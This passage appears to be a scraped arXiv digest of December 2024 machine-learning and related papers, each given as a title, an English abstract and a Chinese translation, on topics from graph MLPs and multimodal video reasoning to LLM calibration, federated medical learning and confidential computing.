modeling for wireless FL (GP-FL), demonstrates a linear-quadratic convergence rate. Numerical experiments with various datasets show that GP-FL outperforms traditional baseline first and second order FL approaches.
更新时间: 2024-12-05 04:27:41
领域: cs.LG
Training MLPs on Graphs without Supervision
Graph Neural Networks (GNNs) have demonstrated their effectiveness in various graph learning tasks, yet their reliance on neighborhood aggregation during inference poses challenges for deployment in latency-sensitive applications, such as real-time financial fraud detection. To address this limitation, recent studies have proposed distilling knowledge from teacher GNNs into student Multi-Layer Perceptrons (MLPs) trained on node content, aiming to accelerate inference. However, these approaches often inadequately explore structural information when inferring unseen nodes. To this end, we introduce SimMLP, a Self-supervised framework for learning MLPs on graphs, designed to fully integrate rich structural information into MLPs. Notably, SimMLP is the first MLP-learning method that can achieve equivalence to GNNs in the optimal case. The key idea is to employ self-supervised learning to align the representations encoded by graph context-aware GNNs and neighborhood dependency-free MLPs, thereby fully integrating the structural information into MLPs. We provide a comprehensive theoretical analysis, demonstrating the equivalence between SimMLP and GNNs based on mutual information and inductive bias, highlighting SimMLP's advanced structural learning capabilities. Additionally, we conduct extensive experiments on 20 benchmark datasets, covering node classification, link prediction, and graph classification, to showcase SimMLP's superiority over state-of-the-art baselines, particularly in scenarios involving unseen nodes (e.g., inductive and cold-start node classification) where structural insights are crucial. Our codes are available at: https://github.com/Zehong-Wang/SimMLP.
Updated: 2024-12-05 04:20:54
标题: 在没有监督的情况下在图上训练MLPs
摘要: 图神经网络(GNNs)已经在各种图学习任务中证明了它们的有效性,然而在推断过程中对邻域聚合的依赖性给部署在延迟敏感应用中,如实时金融欺诈检测,带来了挑战。为了解决这一限制,最近的研究提出了从教师GNNs中提炼知识到在节点内容上训练的学生多层感知器(MLPs)的方法,旨在加速推断。然而,这些方法在推断未见节点时通常未能充分探索结构信息。为此,我们引入了SimMLP,一个自监督框架,用于在图上学习MLPs,旨在将丰富的结构信息完全集成到MLPs中。值得注意的是,SimMLP是第一个在最优情况下可以实现与GNNs等效的MLP学习方法。关键思想是利用自监督学习来对齐由图上下文感知的GNNs和邻域依赖性自由的MLPs编码的表示,从而完全将结构信息集成到MLPs中。我们提供了全面的理论分析,演示了基于互信息和归纳偏差的SimMLP与GNNs之间的等效性,突显了SimMLP的先进结构学习能力。此外,我们在涵盖节点分类、链接预测和图分类的20个基准数据集上进行了广泛实验,展示了SimMLP在超越最先进基线的情况下的优越性,特别是在涉及未见节点的情景(例如归纳和冷启动节点分类)中,结构洞察力至关重要。我们的代码可在以下链接获取:https://github.com/Zehong-Wang/SimMLP。
更新时间: 2024-12-05 04:20:54
领域: cs.LG,cs.AI,cs.SI
CREMA: Generalizable and Efficient Video-Language Reasoning via Multimodal Modular Fusion
Despite impressive advancements in recent multimodal reasoning approaches, they are still limited in flexibility and efficiency, as these models typically process only a few fixed modality inputs and require updates to numerous parameters. This paper tackles these critical challenges and proposes CREMA, a generalizable, highly efficient, and modular modality-fusion framework that can incorporate any new modality to enhance video reasoning. We first augment multiple informative modalities (such as optical flow, 3D point cloud, audio, thermal heatmap, and touch map) from given videos without extra human annotation by leveraging sensors or existing pre-trained models. Next, we introduce a query transformer with multiple parameter-efficient modules associated with each accessible modality. It projects diverse modality features to the LLM token embedding space, allowing the model to integrate different data types for response generation. Furthermore, we propose a novel progressive multimodal fusion design supported by a lightweight fusion module and modality-sequential training strategy. It helps compress information across various assisting modalities, maintaining computational efficiency in the LLM while improving performance. We validate our method on 7 video-language reasoning tasks assisted by diverse modalities, including conventional VideoQA and Video-Audio/3D/Touch/Thermal QA, and achieve better/equivalent performance against strong multimodal LLMs, including OneLLM, BLIP-2, and SeViLA while reducing over 90% trainable parameters. We provide extensive analyses of CREMA, including the impact of each modality on reasoning domains, the design of the fusion module, and example visualizations.
Updated: 2024-12-05 04:16:54
标题: CREMA:多模块融合的通用高效视频-语言推理
摘要: 尽管最近多模态推理方法取得了令人印象深刻的进展,但它们在灵活性和效率方面仍然存在局限性,因为这些模型通常只处理少量固定的模态输入,并且需要更新大量参数。本文解决了这些关键挑战,并提出了CREMA,一个通用、高效且模块化的模态融合框架,可以整合任何新的模态以增强视频推理。我们首先通过利用传感器或现有预训练模型,从给定视频中增加多个信息丰富的模态(如光流、3D点云、音频、热图和触摸地图),而无需额外的人工标注。接下来,我们引入了一个带有多个参数高效模块的查询转换器,与每个可访问的模态相关联。它将不同的模态特征投影到LLM令牌嵌入空间,使模型能够整合不同的数据类型进行响应生成。此外,我们提出了一种新颖的渐进式多模态融合设计,支持轻量级融合模块和模态顺序训练策略。它有助于在各种辅助模态之间压缩信息,在LLM中保持计算效率同时提高性能。我们在7个视频语言推理任务上验证了我们的方法,包括传统的VideoQA和Video-Audio/3D/Touch/Thermal QA,并且在减少超过90%的可训练参数的同时,与强大的多模态LLMs(包括OneLLM、BLIP-2和SeViLA)达到更好/相当的性能。我们对CREMA进行了广泛的分析,包括每个模态对推理领域的影响,融合模块的设计以及示例可视化。
更新时间: 2024-12-05 04:16:54
领域: cs.CV,cs.AI,cs.CL
How Good is ChatGPT in Giving Adaptive Guidance Using Knowledge Graphs in E-Learning Environments?
E-learning environments are increasingly harnessing large language models (LLMs) like GPT-3.5 and GPT-4 for tailored educational support. This study introduces an approach that integrates dynamic knowledge graphs with LLMs to offer nuanced student assistance. By evaluating past and ongoing student interactions, the system identifies and appends the most salient learning context to prompts directed at the LLM. Central to this method is the knowledge graph's role in assessing a student's comprehension of topic prerequisites. Depending on the categorized understanding (good, average, or poor), the LLM adjusts its guidance, offering advanced assistance, foundational reviews, or in-depth prerequisite explanations, respectively. Preliminary findings suggest students could benefit from this tiered support, achieving enhanced comprehension and improved task outcomes. However, several issues related to potential errors arising from LLMs were identified, which can potentially mislead students. This highlights the need for human intervention to mitigate these risks. This research aims to advance AI-driven personalized learning while acknowledging the limitations and potential pitfalls, thus guiding future research in technology and data-driven education.
Updated: 2024-12-05 04:05:43
标题: ChatGPT在电子学习环境中利用知识图谱提供自适应指导的效果如何?
摘要: 电子学习环境越来越多地利用像GPT-3.5和GPT-4这样的大型语言模型(LLMs)来提供定制的教育支持。本研究介绍了一种将动态知识图与LLMs整合以提供细致学生辅助的方法。通过评估过去和正在进行的学生互动,系统识别并附加最显著的学习背景到针对LLMs的提示中。这种方法的中心是知识图在评估学生对主题先决条件的理解方面的作用。根据分类的理解程度(好、一般或差),LLMs调整其指导,分别提供高级辅助、基础复习或深入的先决条件解释。初步研究结果表明学生可以从这种分层支持中受益,实现增强的理解和改善的任务结果。然而,发现了与LLMs可能出现的潜在错误相关的几个问题,这可能会误导学生。这突显了人类干预以减轻这些风险的必要性。本研究旨在推进基于人工智能的个性化学习,同时认识到限制和潜在风险,从而指导未来技术和数据驱动的教育研究。
更新时间: 2024-12-05 04:05:43
领域: cs.AI,cs.ET,I.2.6; I.2.11
What Do Machine Learning Researchers Mean by "Reproducible"?
The concern that Artificial Intelligence (AI) and Machine Learning (ML) are entering a "reproducibility crisis" has spurred significant research in the past few years. Yet with each paper, it is often unclear what someone means by "reproducibility". Our work attempts to clarify the scope of "reproducibility" as displayed by the community at large. In doing so, we propose to refine the research to eight general topic areas. In this light, we see that each of these areas contains many works that do not advertise themselves as being about "reproducibility", in part because they go back decades before the matter came to broader attention.
Updated: 2024-12-05 04:04:39
标题: 机器学习研究者所说的“可重现”是什么意思?
摘要: 人工智能(AI)和机器学习(ML)进入“可重复性危机”的担忧已经在过去几年引发了大量研究。然而,每篇论文中往往不清楚某人所指的“可重复性”是什么意思。我们的工作试图澄清社区整体展示的“可重复性”的范围。在这样做的过程中,我们提议将研究细化为八个一般主题领域。在这种情况下,我们看到这些领域中的许多作品并不宣传自己是关于“可重复性”的,部分原因是因为它们早在广泛关注这个问题之前几十年就存在了。
更新时间: 2024-12-05 04:04:39
领域: cs.LG,cs.AI,stat.ML
Stabilizer bootstrapping: A recipe for efficient agnostic tomography and magic estimation
We study the task of agnostic tomography: given copies of an unknown $n$-qubit state $\rho$ which has fidelity $\tau$ with some state in a given class $C$, find a state which has fidelity $\ge \tau - \epsilon$ with $\rho$. We give a new framework, stabilizer bootstrapping, for designing computationally efficient protocols for this task, and use this to get new agnostic tomography protocols for the following classes: Stabilizer states: We give a protocol that runs in time $\mathrm{poly}(n,1/\epsilon)\cdot (1/\tau)^{O(\log(1/\tau))}$, answering an open question posed by Grewal, Iyer, Kretschmer, Liang [43] and Anshu and Arunachalam [6]. Previous protocols ran in time $\mathrm{exp}(\Theta(n))$ or required $\tau>\cos^2(\pi/8)$. States with stabilizer dimension $n - t$: We give a protocol that runs in time $n^3\cdot(2^t/\tau)^{O(\log(1/\epsilon))}$, extending recent work on learning quantum states prepared by circuits with few non-Clifford gates, which only applied in the realizable setting where $\tau = 1$ [33, 40, 49, 66]. Discrete product states: If $C = K^{\otimes n}$ for some $\mu$-separated discrete set $K$ of single-qubit states, we give a protocol that runs in time $(n/\mu)^{O((1 + \log (1/\tau))/\mu)}/\epsilon^2$. This strictly generalizes a prior guarantee which applied to stabilizer product states [42]. For stabilizer product states, we give a further improved protocol that runs in time $(n^2/\epsilon^2)\cdot (1/\tau)^{O(\log(1/\tau))}$. As a corollary, we give the first protocol for estimating stabilizer fidelity, a standard measure of magic for quantum states, to error $\epsilon$ in $n^3 \mathrm{quasipoly}(1/\epsilon)$ time.
Updated: 2024-12-05 04:01:48
标题: 稳定器引导:一种高效的无偏谱和魔术估计方法
摘要: 我们研究了不可知态谱学的任务:给定未知的$n$量子比特态$\rho$的副本,该态与给定类$C$中某个态的保真度为$\tau$,找到一个与$\rho$保真度$\ge \tau - \epsilon$的态。我们提供了一个新的框架,稳定子引导,用于设计计算效率高的协议,以便解决这个任务,并利用这一框架得到了以下类别的新不可知态谱学协议: 稳定子态:我们提供了一个在时间$\mathrm{poly}(n,1/\epsilon)\cdot (1/\tau)^{O(\log(1/\tau))}$内运行的协议,回答了Grewal、Iyer、Kretschmer、Liang[43]以及Anshu和Arunachalam[6]提出的一个开放问题。先前的协议运行时间为$\mathrm{exp}(\Theta(n))$或要求$\tau>\cos^2(\pi/8)$。 稳定子维度为$n - t$的态:我们提供了一个在时间$n^3\cdot(2^t/\tau)^{O(\log(1/\epsilon))}$内运行的协议,扩展了最近关于通过少量非Clifford门电路准备的量子态的学习工作,该工作仅适用于可实现的情况,其中$\tau = 1$[33, 40, 49, 66]。 离散乘积态:如果$C = K^{\otimes n}$,其中$K$是一些单量子比特态的$\mu$-分离离散集合,我们提供了一个在时间$(n/\mu)^{O((1 + \log (1/\tau))/\mu)}/\epsilon^2$内运行的协议。这严格推广了之前适用于稳定子乘积态的保证[42]。对于稳定子乘积态,我们提供了一个进一步改进的协议,其运行时间为$(n^2/\epsilon^2)\cdot (1/\tau)^{O(\log(1/\tau))}$。 作为推论,我们提供了第一个用于估算稳定子保真度的协议,这是量子态魔法的标准度量,其误差为$\epsilon$,运行时间为$n^3 \mathrm{quasipoly}(1/\epsilon)$。
更新时间: 2024-12-05 04:01:48
领域: quant-ph,cs.CC,cs.DS,cs.LG
Calibrating Reasoning in Language Models with Internal Consistency
Large language models (LLMs) have demonstrated impressive capabilities in various reasoning tasks, aided by techniques like chain-of-thought prompting that elicits verbalized reasoning. However, LLMs often generate text with obvious mistakes and contradictions, raising doubts about their ability to robustly process and utilize generated rationales. In this work, we investigate reasoning in LLMs through the lens of internal representations, focusing on how these representations are influenced by generated rationales. Our preliminary analysis reveals that while generated rationales improve answer accuracy, inconsistencies emerge between the model's internal representations in middle layers and those in final layers, potentially undermining the reliability of their reasoning processes. To address this, we propose internal consistency as a measure of the model's confidence by examining the agreement of latent predictions decoded from intermediate layers. Extensive empirical studies across different models and datasets demonstrate that internal consistency effectively distinguishes between correct and incorrect reasoning paths. Motivated by this, we propose a new approach to calibrate reasoning by up-weighting reasoning paths with high internal consistency, resulting in a significant boost in reasoning performance. Further analysis uncovers distinct patterns in attention and feed-forward modules across layers, providing insights into the emergence of internal inconsistency. In summary, our results demonstrate the potential of using internal representations for self-evaluation of LLMs. Our code is available at github.com/zhxieml/internal-consistency.
Updated: 2024-12-05 04:01:28
标题: 用内部一致性校准语言模型中的推理
摘要: 大型语言模型(LLMs)在各种推理任务中展示出令人印象深刻的能力,借助像思维链提示这样的技术引发口头推理。然而,LLMs经常生成带有明显错误和矛盾的文本,这引发了对它们处理和利用生成的推理依据能力的怀疑。在这项工作中,我们通过内部表示的视角研究LLMs中的推理,重点关注这些表示受到生成的推理依据的影响。我们的初步分析表明,虽然生成的推理依据提高了答案的准确性,但模型中间层的内部表示与最终层中的内部表示之间存在矛盾,可能会损害其推理过程的可靠性。为了解决这个问题,我们提出内部一致性作为模型信心的衡量标准,通过检查从中间层解码的潜在预测的一致性来评估。通过对不同模型和数据集进行广泛的实证研究,我们展示了内部一致性有效区分正确和错误的推理路径。受此启发,我们提出了一种校准推理的新方法,通过提高具有高内部一致性的推理路径的权重,从而显著提升推理性能。进一步分析揭示了各层中注意力和前馈模块的不同模式,为内部不一致性的出现提供了见解。总之,我们的结果展示了利用内部表示进行LLMs的自我评估的潜力。我们的代码可在github.com/zhxieml/internal-consistency找到。
更新时间: 2024-12-05 04:01:28
领域: cs.AI,cs.CL
A Bidirectional Siamese Recurrent Neural Network for Accurate Gait Recognition Using Body Landmarks
Gait recognition is a significant biometric technique for person identification, particularly in scenarios where other physiological biometrics are impractical or ineffective. In this paper, we address the challenges associated with gait recognition and present a novel approach to improve its accuracy and reliability. The proposed method leverages advanced techniques, including sequential gait landmarks obtained through the Mediapipe pose estimation model, Procrustes analysis for alignment, and a Siamese biGRU-dualStack Neural Network architecture for capturing temporal dependencies. Extensive experiments were conducted on large-scale cross-view datasets to demonstrate the effectiveness of the approach, achieving high recognition accuracy compared to other models. The model demonstrated accuracies of 95.7%, 94.44%, 87.71%, and 86.6% on CASIA-B, SZU RGB-D, OU-MVLP, and Gait3D datasets respectively. The results highlight the potential applications of the proposed method in various practical domains, indicating its significant contribution to the field of gait recognition.
Updated: 2024-12-05 03:47:49
标题: 一种用于使用身体地标进行准确步态识别的双向连体循环神经网络
摘要: 步态识别是一种重要的生物特征识别技术,特别适用于其他生理特征识别方法不切实际或无效的情况。本文针对步态识别所面临的挑战,提出了一种新颖的方法来提高其准确性和可靠性。所提出的方法利用了先进技术,包括通过Mediapipe姿势估计模型获得的序列步态地标、Procrustes分析进行对齐,以及用于捕获时间依赖性的Siamese biGRU-dualStack神经网络架构。在大规模跨视角数据集上进行了大量实验,以证明该方法的有效性,相较于其他模型取得了高识别准确率。该模型在CASIA-B、SZU RGB-D、OU-MVLP和Gait3D数据集上分别表现出95.7%、94.44%、87.71%和86.6%的准确率。结果突显了所提方法在各种实际领域中的潜在应用,表明其对步态识别领域的重要贡献。
更新时间: 2024-12-05 03:47:49
领域: cs.CV,cs.AI,cs.LG
FedMetaMed: Federated Meta-Learning for Personalized Medication in Distributed Healthcare Systems
Personalized medication aims to tailor healthcare to individual patient characteristics. However, the heterogeneity of patient data across healthcare systems presents significant challenges to achieving accurate and effective personalized treatments. Ethical concerns further complicate the aggregation of large volumes of data from diverse institutions. Federated Learning (FL) offers a promising decentralized solution by enabling collaborative model training through the exchange of client models rather than raw data, thus preserving privacy. However, existing FL methods often suffer from retrogression during server aggregation, leading to a decline in model performance in real-world medical FL settings. To address data variability in distributed healthcare systems, we introduce Federated Meta-Learning for Personalized Medication (FedMetaMed), which combines federated learning and meta-learning to create models that adapt to diverse patient data across healthcare systems. The FedMetaMed framework aims to produce superior personalized models for individual clients by addressing these limitations. Specifically, we introduce Cumulative Fourier Aggregation (CFA) at the server to improve stability and effectiveness in global knowledge aggregation. CFA achieves this by gradually integrating client models from low to high frequencies. At the client level, we implement a Collaborative Transfer Optimization (CTO) strategy with a three-step process - Retrieve, Reciprocate, and Refine - to enhance the personalized local model through seamless global knowledge transfer. Experiments on real-world medical imaging datasets demonstrate that FedMetaMed outperforms state-of-the-art FL methods, showing superior generalization even on out-of-distribution cohorts.
Updated: 2024-12-05 03:36:55
标题: FedMetaMed:在分布式医疗系统中个性化药物治疗的联邦元学习
摘要: 个性化药物治疗旨在根据个体患者特征量身定制医疗保健。然而,跨医疗系统的患者数据的异质性给实现准确和有效的个性化治疗带来了重大挑战。伦理关切进一步使来自不同机构的大量数据的汇总变得更加复杂。联邦学习(FL)通过通过交换客户端模型而不是原始数据来实现协作模型训练,从而保护隐私,提供了一种有前途的分散解决方案。然而,现有的FL方法在服务器聚合过程中经常出现退化,导致在真实医疗FL环境中模型性能下降。为了解决分布式医疗系统中的数据变异性,我们引入了用于个性化药物治疗的联邦元学习(FedMetaMed),将联邦学习和元学习结合起来,以创建适应医疗系统中多样化患者数据的模型。FedMetaMed框架旨在通过解决这些局限性为个体客户生成优越的个性化模型。具体而言,我们在服务器端引入了累积傅立叶聚合(CFA)来提高全局知识聚合的稳定性和效力。CFA通过逐渐集成来自低频到高频的客户端模型来实现这一目标。在客户端层面,我们实施了一个协同转移优化(CTO)策略,通过一个三步过程 - 检索、互惠、和完善 - 来增强通过无缝全局知识转移的个性化本地模型。对真实医学图像数据集的实验表明,FedMetaMed优于最先进的FL方法,在分布外队列上表现出更好的概括能力。
更新时间: 2024-12-05 03:36:55
领域: cs.AI
Maximizing Information Gain in Privacy-Aware Active Learning of Email Anomalies
Redacted emails satisfy most privacy requirements but they make it more difficult to detect anomalous emails that may be indicative of data exfiltration. In this paper we develop an enhanced method of Active Learning using an information gain maximizing heuristic, and we evaluate its effectiveness in a real world setting where only redacted versions of email could be labeled by human analysts due to privacy concerns. In the first case study we examined how Active Learning should be carried out. We found that model performance was best when a single highly skilled (in terms of the labelling task) analyst provided the labels. In the second case study we used confidence ratings to estimate the labeling uncertainty of analysts and then prioritized instances for labeling based on the expected information gain (the difference between model uncertainty and analyst uncertainty) that would be provided by labelling each instance. We found that the information maximization gain heuristic improved model performance over existing sampling methods for Active Learning. Based on the results obtained, we recommend that analysts should be screened, and possibly trained, prior to implementation of Active Learning in cybersecurity applications. We also recommend that the information gain maximizing sample method (based on expert confidence) should be used in early stages of Active Learning, providing that well-calibrated confidence can be obtained. We also note that the expertise of analysts should be assessed prior to Active Learning, as we found that analysts with lower labelling skill had poorly calibrated (over-) confidence in their labels.
Updated: 2024-12-05 03:26:16
标题: 在隐私感知主动学习电子邮件异常中最大化信息增益
摘要: 经过编辑处理的电子邮件基本满足了大多数隐私要求,但会增加检测可能表明数据外泄的异常电子邮件的难度。在本文中,我们开发了一种增强型主动学习方法,利用信息增益最大化启发式,并在仅由于隐私问题而需要人类分析员标记的电子邮件的真实世界环境中评估其有效性。在第一个案例研究中,我们研究了如何进行主动学习。我们发现,在单个高技能(就标记任务而言)分析员提供标签时,模型性能最佳。在第二个案例研究中,我们使用置信度评分来估计分析员的标记不确定性,然后根据每个实例提供的预期信息增益(模型不确定性和分析员不确定性之间的差异)对实例进行标记优先级排序。我们发现,信息最大化增益启发式方法相对于现有的主动学习采样方法改善了模型性能。根据所获得的结果,我们建议在网络安全应用中实施主动学习之前应对分析员进行筛选,并可能进行培训。我们还建议在主动学习的早期阶段使用基于专家置信度的信息增益最大化样本方法,前提是能够获得经过良好校准的置信度。我们还指出,在主动学习之前应评估分析员的专业知识,因为我们发现,具有较低标记技能的分析员对其标签具有不良校准(过度)置信。
更新时间: 2024-12-05 03:26:16
领域: cs.HC,cs.CR,cs.LG
From Pixels to Insights: A Survey on Automatic Chart Understanding in the Era of Large Foundation Models
Data visualization in the form of charts plays a pivotal role in data analysis, offering critical insights and aiding in informed decision-making. Automatic chart understanding has witnessed significant advancements with the rise of large foundation models in recent years. Foundation models, such as large language models, have revolutionized various natural language processing tasks and are increasingly being applied to chart understanding tasks. This survey paper provides a comprehensive overview of the recent developments, challenges, and future directions in chart understanding within the context of these foundation models. We review fundamental building blocks crucial for studying chart understanding tasks. Additionally, we explore various tasks and their evaluation metrics and sources of both charts and textual inputs. Various modeling strategies are then examined, encompassing both classification-based and generation-based approaches, along with tool augmentation techniques that enhance chart understanding performance. Furthermore, we discuss the state-of-the-art performance of each task and discuss how we can improve the performance. Challenges and future directions are addressed, highlighting the importance of several topics, such as domain-specific charts, lack of efforts in developing evaluation metrics, and agent-oriented settings. This survey paper serves as a comprehensive resource for researchers and practitioners in the fields of natural language processing, computer vision, and data analysis, providing valuable insights and directions for future research in chart understanding leveraging large foundation models. The studies mentioned in this paper, along with emerging new research, will be continually updated at: https://github.com/khuangaf/Awesome-Chart-Understanding.
Updated: 2024-12-05 03:26:13
标题: 从像素到洞察:在大型基础模型时代自动图表理解的调查
摘要: 数据可视化以图表形式发挥了在数据分析中的关键作用,提供了关键见解,帮助做出明智的决策。随着近年来大型基础模型的兴起,自动图表理解已经取得了显著进展。基础模型,如大型语言模型,已经彻底改变了各种自然语言处理任务,并越来越多地被应用于图表理解任务。本调查论文在这些基础模型的背景下,提供了对图表理解最新发展,挑战和未来方向的全面概述。我们回顾了研究图表理解任务所必不可少的基本构建模块。此外,我们探讨了各种任务及其评估指标和图表和文本输入的来源。然后,我们检查了各种建模策略,包括基于分类和生成的方法,以及增强图表理解性能的工具增强技术。此外,我们讨论了每个任务的最新性能,并讨论了如何改善性能。我们讨论了挑战和未来方向,强调了几个重要主题的重要性,如领域特定的图表,在开发评估指标方面的努力不足以及面向代理的设置。本调查论文为自然语言处理,计算机视觉和数据分析领域的研究人员和从业者提供了全面的资源,为未来基于大型基础模型的图表理解研究提供了宝贵的见解和方向。本文提到的研究以及新兴的研究将持续更新在:https://github.com/khuangaf/Awesome-Chart-Understanding。
更新时间: 2024-12-05 03:26:13
领域: cs.CL,cs.AI,cs.CV
HybridGS: Decoupling Transients and Statics with 2D and 3D Gaussian Splatting
Generating high-quality novel view renderings of 3D Gaussian Splatting (3DGS) in scenes featuring transient objects is challenging. We propose a novel hybrid representation, termed as HybridGS, using 2D Gaussians for transient objects per image and maintaining traditional 3D Gaussians for the whole static scenes. Note that, the 3DGS itself is better suited for modeling static scenes that assume multi-view consistency, but the transient objects appear occasionally and do not adhere to the assumption, thus we model them as planar objects from a single view, represented with 2D Gaussians. Our novel representation decomposes the scene from the perspective of fundamental viewpoint consistency, making it more reasonable. Additionally, we present a novel multi-view regulated supervision method for 3DGS that leverages information from co-visible regions, further enhancing the distinctions between the transients and statics. Then, we propose a straightforward yet effective multi-stage training strategy to ensure robust training and high-quality view synthesis across various settings. Experiments on benchmark datasets show our state-of-the-art performance of novel view synthesis in both indoor and outdoor scenes, even in the presence of distracting elements.
Updated: 2024-12-05 03:20:35
标题: HybridGS:使用2D和3D高斯喷涂解耦瞬态和静态
摘要: 在涉及瞬态物体的场景中生成高质量的3D高斯点阵(3DGS)的新视角渲染具有挑战性。我们提出了一种新颖的混合表示法,称为HybridGS,使用2D高斯函数来表示每幅图像中的瞬态物体,并保持传统的3D高斯函数用于整个静态场景。需要注意的是,3DGS本身更适合建模假设多视角一致性的静态场景,而瞬态物体偶尔出现且不符合该假设,因此我们将它们建模为单视角的平面物体,用2D高斯函数表示。我们的新颖表示法从基本视角一致性的角度分解场景,使其更加合理。此外,我们提出了一种新颖的多视角调节监督方法,利用来自共视区域的信息,进一步增强瞬态物体和静态物体之间的区别。然后,我们提出了一种简单但有效的多阶段训练策略,以确保在各种设置中进行稳健训练和高质量视角合成。在基准数据集上进行的实验显示,我们在室内和室外场景中进行新视角合成的性能处于领先地位,即使存在干扰元素。
更新时间: 2024-12-05 03:20:35
领域: cs.CV,cs.AI
Linear Causal Representation Learning from Unknown Multi-node Interventions
Despite the multifaceted recent advances in interventional causal representation learning (CRL), they primarily focus on the stylized assumption of single-node interventions. This assumption is not valid in a wide range of applications, and generally, the subset of nodes intervened in an interventional environment is fully unknown. This paper focuses on interventional CRL under unknown multi-node (UMN) interventional environments and establishes the first identifiability results for general latent causal models (parametric or nonparametric) under stochastic interventions (soft or hard) and linear transformation from the latent to observed space. Specifically, it is established that given sufficiently diverse interventional environments, (i) identifiability up to ancestors is possible using only soft interventions, and (ii) perfect identifiability is possible using hard interventions. Remarkably, these guarantees match the best-known results for more restrictive single-node interventions. Furthermore, CRL algorithms are also provided that achieve the identifiability guarantees. A central step in designing these algorithms is establishing the relationships between UMN interventional CRL and score functions associated with the statistical models of different interventional environments. Establishing these relationships also serves as constructive proof of the identifiability guarantees.
Updated: 2024-12-05 03:16:26
标题: 线性因果表示学习来自未知的多节点干预
摘要: 尽管干预因果表征学习(CRL)最近取得了多方面的进展,但它们主要集中在单节点干预的理想假设上。这个假设在广泛的应用中并不成立,通常干预环境中被干预的节点子集完全未知。本文关注在未知多节点(UMN)干预环境下的干预CRL,并建立了一般潜在因果模型(参数化或非参数化)在随机干预(软或硬)和从潜在到观测空间的线性转换下的首次可识别结果。具体地,通过给予足够多样化的干预环境,已经确定(i)仅使用软干预即可实现直至祖先的可识别性,以及(ii)使用硬干预可以实现完美可识别性。值得注意的是,这些保证与更为严格的单节点干预的最佳已知结果相匹配。此外,还提供了能够实现可识别性保证的CRL算法。设计这些算法的一个关键步骤是建立UMN干预CRL和与不同干预环境的统计模型相关的评分函数之间的关系。建立这些关系也作为可识别性保证的建设性证明。
更新时间: 2024-12-05 03:16:26
领域: cs.LG,stat.ML
Dynamic Graph Transformer with Correlated Spatial-Temporal Positional Encoding
Learning effective representations for Continuous-Time Dynamic Graphs (CTDGs) has garnered significant research interest, largely due to its powerful capabilities in modeling complex interactions between nodes. A fundamental and crucial requirement for representation learning in CTDGs is the appropriate estimation and preservation of proximity. However, due to the sparse and evolving characteristics of CTDGs, the spatial-temporal properties inherent in high-order proximity remain largely unexplored. Despite its importance, this property presents significant challenges due to the computationally intensive nature of personalized interaction intensity estimation and the dynamic attributes of CTDGs. To this end, we propose a novel Correlated Spatial-Temporal Positional encoding that incorporates a parameter-free personalized interaction intensity estimation under the weak assumption of the Poisson Point Process. Building on this, we introduce the Dynamic Graph Transformer with Correlated Spatial-Temporal Positional Encoding (CorDGT), which efficiently retains the evolving spatial-temporal high-order proximity for effective node representation learning in CTDGs. Extensive experiments on seven small and two large-scale datasets demonstrate the superior performance and scalability of the proposed CorDGT. The code is available at: https://github.com/wangz3066/CorDGT.
Updated: 2024-12-05 03:15:01
标题: 具有相关空间-时间位置编码的动态图变换器
摘要: 学习连续时间动态图(CTDGs)的有效表示已经引起了重要的研究兴趣,这主要是因为它在建模节点之间复杂交互方面具有强大的能力。在CTDGs中进行表示学习的一个基本和关键要求是适当地估计和保留接近性。然而,由于CTDGs的稀疏和演变特性,高阶接近性中固有的时空特性仍然大多未被探索。尽管其重要性,该属性由于个性化交互强度估计的计算密集性和CTDGs的动态属性而带来显著挑战。因此,我们提出了一种新颖的相关时空位置编码,其在泊松点过程的弱假设下融入了无参数的个性化交互强度估计。在此基础上,我们引入了具有相关时空位置编码的动态图变换器(CorDGT),它有效地保留了CTDGs中的演变时空高阶接近性,以实现有效的节点表示学习。在七个小型和两个大型数据集上进行的大量实验表明了所提出的CorDGT的优越性能和可扩展性。该代码可以在https://github.com/wangz3066/CorDGT上找到。
更新时间: 2024-12-05 03:15:01
领域: cs.LG
CCxTrust: Confidential Computing Platform Based on TEE and TPM Collaborative Trust
Confidential Computing has emerged to address data security challenges in cloud-centric deployments by protecting data in use through hardware-level isolation. However, reliance on a single hardware root of trust (RoT) limits user confidence in cloud platforms, especially for high-performance AI services, where end-to-end protection of sensitive models and data is critical. Furthermore, the lack of interoperability and a unified trust model in multi-cloud environments prevents the establishment of a cross-platform, cross-cloud chain of trust, creating a significant trust gap for users with high privacy requirements. To address the challenges mentioned above, this paper proposes CCxTrust (Confidential Computing with Trust), a confidential computing platform leveraging collaborative roots of trust from TEE and TPM. CCxTrust combines the black-box RoT embedded in the CPU-TEE with the flexible white-box RoT of TPM to establish a collaborative trust framework. The platform implements independent Roots of Trust for Measurement (RTM) for TEE and TPM, and a collaborative Root of Trust for Report (RTR) for composite attestation. The Root of Trust for Storage (RTS) is solely supported by TPM. We also present the design and implementation of a confidential TPM supporting multiple modes for secure use within confidential virtual machines. Additionally, we propose a composite attestation protocol integrating TEE and TPM to enhance security and attestation efficiency, which is proven secure under the PCL protocol security model. We implemented a prototype of CCxTrust on a confidential computing server with AMD SEV-SNP and TPM chips, requiring minimal modifications to the TPM and guest Linux kernel. The composite attestation efficiency improved by 24% without significant overhead, while Confidential TPM performance showed a 16.47% reduction compared to standard TPM.
Updated: 2024-12-05 03:12:49
标题: CCxTrust:基于TEE和TPM协同信任的保密计算平台
摘要: 机密计算已经出现,以解决云中部署中的数据安全挑战,通过硬件级别的隔离保护正在使用的数据。然而,仅依赖单一硬件信任根(RoT)限制了用户对云平台的信心,特别是对于高性能人工智能服务,在这种情况下,对敏感模型和数据的端到端保护至关重要。此外,在多云环境中缺乏互操作性和统一的信任模型,阻碍了建立跨平台、跨云的信任链,为具有高隐私要求的用户创造了重大信任差距。为了解决上述挑战,本文提出了CCxTrust(带有信任的机密计算),这是一个利用来自TEE和TPM的协作信任根的机密计算平台。CCxTrust将嵌入在CPU-TEE中的黑盒RoT与TPM的灵活白盒RoT结合起来,建立一个协作信任框架。该平台为TEE和TPM实现独立的测量信任根(RTM),以及用于复合认证的协作报告信任根(RTR)。存储信任根(RTS)仅由TPM支持。我们还提出了一个支持多种安全使用模式的机密TPM的设计和实现,用于机密虚拟机内。此外,我们提出了一个整合TEE和TPM的复合认证协议,以增强安全性和认证效率,在PCL协议安全模型下被证明是安全的。我们在具有AMD SEV-SNP和TPM芯片的机密计算服务器上实现了CCxTrust的原型,对TPM和客户Linux内核进行了最小修改。复合认证效率提高了24%,而机密TPM的性能与标准TPM相比降低了16.47%。
更新时间: 2024-12-05 03:12:49
领域: cs.CR,D.4.6; F.4.3
LL-ICM: Image Compression for Low-level Machine Vision via Large Vision-Language Model
